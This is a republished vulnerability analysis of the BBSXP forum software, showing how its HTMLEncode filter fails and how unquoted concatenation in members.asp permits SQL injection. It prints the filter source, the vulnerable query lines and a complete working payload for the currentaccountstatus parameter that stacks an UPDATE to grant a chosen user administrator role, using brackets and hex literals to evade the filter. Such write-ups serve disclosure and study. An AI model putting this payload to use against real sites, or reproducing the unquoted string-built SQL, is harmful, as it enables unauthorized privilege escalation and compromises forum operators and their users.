BBSXP: bypassing the filter to keep injecting (vulnerability analysis)
程序员文章站
2022-03-19 15:32:14
Original post date: 08-10-08
Vulnerability analysis:
The latest official filter function, HTMLEncode, now also filters the character *. It can still be bypassed for injection: it entity-encodes quotes, spaces, commas, semicolons, the -- comment marker and a few other characters, but leaves parentheses, square brackets, the equals sign, digits and 0x hex literals untouched, and several fields in members.asp are concatenated into SQL without surrounding quotes, so none of the encoded characters is needed to break out.
Function HTMLEncode(fString)
    ' Filter function from the latest official release. The entity strings on the
    ' right-hand side were restored here: the mirror had decoded them back to the
    ' raw characters (e.g. Replace(fString,CHR(34),""") ), which is not valid VBScript.
    fString=Replace(fString,CHR(9),"")                     ' tab
    fString=Replace(fString,CHR(13),"")                    ' CR
    fString=Replace(fString,CHR(22),"")
    fString=Replace(fString,CHR(38),"&amp;")               ' "&"
    fString=Replace(fString,CHR(32),"&nbsp;")              ' " " (space)
    fString=Replace(fString,CHR(34),"&quot;")              ' double quote
    fString=Replace(fString,CHR(39),"&#39;")               ' "'"
    fString=Replace(fString,CHR(42),"&#42;")               ' "*" (newly filtered in this release)
    fString=Replace(fString,CHR(44),"&#44;")               ' ","
    fString=Replace(fString,CHR(45)&CHR(45),"&#45;&#45;")  ' "--"
    fString=Replace(fString,CHR(60),"&lt;")                ' "<"
    fString=Replace(fString,CHR(62),"&gt;")                ' ">"
    fString=Replace(fString,CHR(92),"&#92;")               ' "\"
    fString=Replace(fString,CHR(59),"&#59;")               ' ";"
    fString=Replace(fString,CHR(10),"<br>")                ' LF
    ' Entity fix-up after the ";" replacement above. The pattern is left exactly as
    ' the mirror extracted it; it was damaged there and cannot be recovered from the page.
    fString=ReplaceText(fString,"([])([a-z0-9]*);","$1$2;")
    If SiteConfig("bannedtext")<>"" Then fString=ReplaceText(fString,"("&SiteConfig("bannedtext")&")",String(Len("&$1&"),"*"))
    If IsSqlDatabase=0 Then  ' filter katakana (Japanese characters) [\u30a0-\u30ff] by yuzi
        fString=Escape(fString)
        ' the mirror shows the replacement as "0$1;"; "&#x30" decodes to "0", so the
        ' original "&#x30$1;" (a numeric entity for U+30xx) is assumed here
        fString=ReplaceText(fString,"%u30([a-f][0-f])","&#x30$1;")
        fString=Unescape(fString)
    End If
    HTMLEncode=fString
End Function
members.asp is used as the test case (the line numbers are those of the original file):
searchtype=HTMLEncode(Request("searchtype"))                     ' line 8
searchtext=HTMLEncode(Request("searchtext"))
searchrole=RequestInt("searchrole")                              ' only this field is parsed as an integer
currentaccountstatus=HTMLEncode(Request("currentaccountstatus"))
......
' searchtype is spliced in as a column name, searchtext inside a quoted LIKE pattern
If searchtext<>"" Then item=item&" and ("&searchtype&" like '%"&searchtext&"%')"   ' line 18
......
' currentaccountstatus is spliced in as a bare numeric value; no quote is needed to break out
' (the mirror rendered "&currentaccountstatus" as "¤taccountstatus": "&curren" decoded to the ¤ sign)
If currentaccountstatus<>"" Then item=item&" and useraccountstatus="&currentaccountstatus&""   ' line 22
If item<>"" Then item=" where "&Mid(item,5)                      ' drop the leading " and"
......
totalcount=Execute("select count(userid) from ["&tableprefix&"users]"&item)(0)   ' get the row count; line 54
Look at a SQL statement of the kind this allows:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006c003600330036003400)
Here the userid variable passes the filter and the UPDATE executes. The payload contains none of the characters HTMLEncode touches: parentheses and square brackets stand in for whitespace, the username is written as a 0x hex literal (UTF-16LE for the target account name) instead of a quoted string, and SQL Server runs the second statement as part of the same batch without any separator.
Construct the same thing for members.asp:
searchtype=1
searchtext=1
currentaccountstatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006c003600330036003400)
With these three parameters the count query at line 54 becomes
select count(userid) from [bbsxp_users] where (1 like '%1%') and useraccountstatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006c003600330036003400)
and the target user's userroleid is set to 1 while the page is being rendered.